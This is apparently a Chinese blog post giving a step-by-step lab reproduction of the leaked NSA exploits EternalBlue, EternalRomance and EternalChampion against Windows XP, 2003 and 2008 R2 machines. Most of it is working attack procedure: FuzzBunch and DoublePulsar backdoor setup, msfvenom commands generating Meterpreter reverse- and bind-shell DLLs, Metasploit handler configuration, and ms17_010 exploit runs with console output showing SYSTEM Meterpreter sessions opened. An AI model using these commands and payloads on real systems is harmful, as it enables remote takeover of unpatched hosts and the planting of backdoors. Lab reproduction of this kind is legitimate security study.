永恒之蓝、永恒浪漫、永恒冠军复现

自从Shadow Brokers(影子经纪人)泄露NSA(美国安全局) 的大量黑客工具,很多人就开始研究该黑客工具利用利用方式。其中比较出名的利用方式就是WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件就是利用了其中的永恒之蓝进行传播的。一直听着别人的利用方式,今天就去学习复现一下。

Eternalblue(永恒之蓝)

测试环境

攻击机(window2003) 安装FuzzBunch等 ip 192.168.1.234
靶机(xp) 被攻击 ip 192.168.1.238
另一台攻击机(kail) 监听端口,靶机返回shell到此攻击机 ip 192.168.1.230

window2003相关环境的安装

Python2.6:https://www.python.org/download/releases/2.6/(记得加到环境变量里)
PyWin32 v2.12(根据自己的攻击机系统选择合适的版本) :https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
还有FuzzBunch https://github.com/misterch0c/shadowbroker
在fb.py中的72行记得注释掉要不会出错。

FuzzBunch.xml中修改下图方框中的路径为你的攻击机上的安装目录相应文件的路径

尝试攻击

运行fb.py

设置目标地址为靶机(xp)地址,回调地址为本机地址

运行

use Eternalbule

当是否提示进行变量设置,选择yes。

攻击的系统(可以看到该模块可以攻击系统对象),此此测试环境是xp,所以就选择0 。传输方式选择1 ‘FB’.最后询问是否使用管道,就默认。

成功后显示

失败了可以

execute

多次尝试一下。失败了没关系,下面能成功就行。

生成dll

在kail中
因为是此环境中靶机xp是32位,所以就使用一下命令生成,然后复制到攻击机(window2003)中

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=5555 -f dll >reverse.dll

如果是靶机是64位,就

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=5555 -f dll >reverse.dll

payload(载荷)中
bind:攻击者连接目标机器的模式,通常比较适合内网渗透,有时会被防火墙拦下
reverse:目标机连接攻击者的模式,基本上不会被防火墙阻拦。
附上两条bind

#32位
msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.1.234 LPORT=5555 -f dll >bind32.dll
#64位
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=192.168.1.234 LPORT=5555 -f dll >bind64.dll
```

## kail监听
```bash
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(multi/handler) > set lport 5555
lport => 5555
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.230:5555

使用DoublePulsar

use DoublePulsar


Architecture 选择 x32,Function 选 RunDLL,然后输入 DLL 路径

成功的话
攻击机(window2003)

攻击机(kail)

Eternalromance(永恒浪漫)

测试环境

攻击机(window2003) 安装shadowbroker等 ip 192.168.1.234
靶机(window2003) 被攻击 ip 192.168.1.135
另一台攻击机(kail) 监听端口,靶机返回shell到此攻击机 ip 192.168.1.230

Smbtouch判断可用漏洞

use Smbtouch 
execute


显示可用的漏洞模块

Doublepulsar生成可用shellcode

use Doublepulsar

一路回车知道,注意选择 *0) OutputInstall ,此项功能可生成shellcode
文件名为shellcode.bin(可命名为任意文件)

在这里可以看到永恒浪漫可以攻击的系统对象,可以攻击的window系统还是挺多的。

一路回车,生成shellcode.bin

EternalRomance植入Doublepulsar后门

use EternalRomance

一路默认,Pipe[] 和Share[] 为可选项,直接回车跳过,Credentials选Anonymous

输入先前生成的文件地址

一路默认,执行成功

已经成功的植入Doublepulsar后门了,可以利用Doublepulsar

生成dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=5555 -f dll >reverse.dll

将生成的reverse.dll复制到攻击机(window2003)中

kail监听

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(multi/handler) > set lport 5555
lport => 5555
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.230:5555

Doublepulsar注入

use Doublepulsar

一路默认,注意在Function处选择 2)RunDLL,输入dll文件的位置

然后回车到结束即可成功利用

Eternalchampion(永恒冠军)

测试环境

攻击机(window2003) 安装FuzzBunch等 ip 192.168.1.234
靶机(window2008 r2) 被攻击 ip 192.168.1.187
另一台攻击机(kail) 监听端口,靶机返回shell到此攻击机 ip 192.168.1.230

工具:winhex

运行 FuzzBunch

targetIP写靶机 IP 192.168.1.187,CallBack写本机ip 192.168.1.234,不使用 Redirection

smbtouch 探测

先用smbtouch 探测一下可以利用的模块

use smbtouch
execute


显示漏洞利用

从图中看出可以使用永恒的冠军

Doublepulsar 生成 shellcode

use Doublepulsar

这次的测试环境的靶机是64位的,所以系统选择x64

一路回车直到 出现 0)OutputInstall的选项,选择0输入文件保存地址,这里我写 c:\shellcode64.bin

一直回车 ,最后生成shellcode.bin

将 shellcode 转换成 HEX

因为 EternalChampion 需要的是ShellcodeBuffer而不是ShellcodeFile,所以这里要利用winhex将 Doublepulsar 生成的 shellcode 转换成十六进制,后面要用到。

EternalChampion 进行攻击

use EternalChampion

一直默认回车,直到shellcodeBuffer[]: 将刚才的shellcode64.dll的十六进制的值,粘贴到这里,要一两分钟才能粘贴完,静静等待。

在下图我们可以看到永恒的冠军针对的系统还挺多的。

然后又是一路回车,到Mode :: Delivery mechanism 选择 FB

接下来,还是回车回车回车。

复现失败
运行execute多次,还是失败,不知道怎么回事,每次到 这里都没有成功过。不管了,看下面能否成功。

生成dll


将生成的dll复制到window2003中

kail监听

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.230:6666

使用 Doublepulsar 注入 dll

use DoublePulsar

然后到function 选择2)Run DLL,输入 dll 文件路

然后运行,回车默认,这里还是失败了。
试了很多的机子都没有成功。无奈!

msf的利用模块

测试环境

攻击机(kail) ip 192.168.1.234
靶机(window2008 R2) ip 192.168.1.238

ms17_010_eternalblue

msf > search ms17_010

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf exploit(windows/smb/ms17_010_psexec) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888
lport => 8888
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.230:8888
[*] 192.168.1.187:445 - Connecting to target for exploitation.
[+] 192.168.1.187:445 - Connection established for exploitation.
[+] 192.168.1.187:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.187:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.1.187:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.1.187:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.1.187:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 192.168.1.187:445 - 0x00000030 6b 20 31 k 1
[+] 192.168.1.187:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.187:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.187:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.187:445 - Starting non-paged pool grooming
[+] 192.168.1.187:445 - Sending SMBv2 buffers
[+] 192.168.1.187:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.187:445 - Sending final SMBv2 buffers.
[*] 192.168.1.187:445 - Sending last fragment of exploit packet!
[*] 192.168.1.187:445 - Receiving response from exploit packet
[+] 192.168.1.187:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.187:445 - Sending egg to corrupted connection.
[*] 192.168.1.187:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.187
[*] Meterpreter session 3 opened (192.168.1.230:8888 -> 192.168.1.187:54937) at 2018-06-01 20:11:08 -0400
[+] 192.168.1.187:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.187:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.187:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > ifconfig

Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3c:07:87
MTU : 1500
IPv4 Address : 192.168.1.187
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2001:250:6801:5501:64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : 2001:250:6801:5501:ba70:f4ff:0:bea
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::

ms17_010_psexec



msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(windows/smb/ms17_010_psexec) > set lport 7777
lport => 7777
msf exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.230:7777
[*] 192.168.1.187:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.1.187:445 - Built a write-what-where primitive...
[+] 192.168.1.187:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 192.168.1.187
[*] Meterpreter session 2 opened (192.168.1.230:7777 -> 192.168.1.187:54873) at 2018-06-01 20:04:07 -0400

meterpreter > ifconfig

Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3c:07:87
MTU : 1500
IPv4 Address : 192.168.1.187
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2001:250:6801:5501:64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : 2001:250:6801:5501:ba70:f4ff:0:bea
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::

本文章主要是操作步骤的,没有太多思路的分析,如果想仔细了解,可以看看以下的参考文章

参考文章

永恒之蓝的参考文章:
http://www.freebuf.com/articles/system/133853.html
https://www.bennythink.com/shadowbroker.html
永恒的浪漫的参考文章
http://www.freebuf.com/articles/system/132879.html
永恒的冠军的参考文章
https://www.bennythink.com/eternalchampion.html
ms17_010_psexec的简介
https://github.com/rapid7/metasploit-framework/pull/9473

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器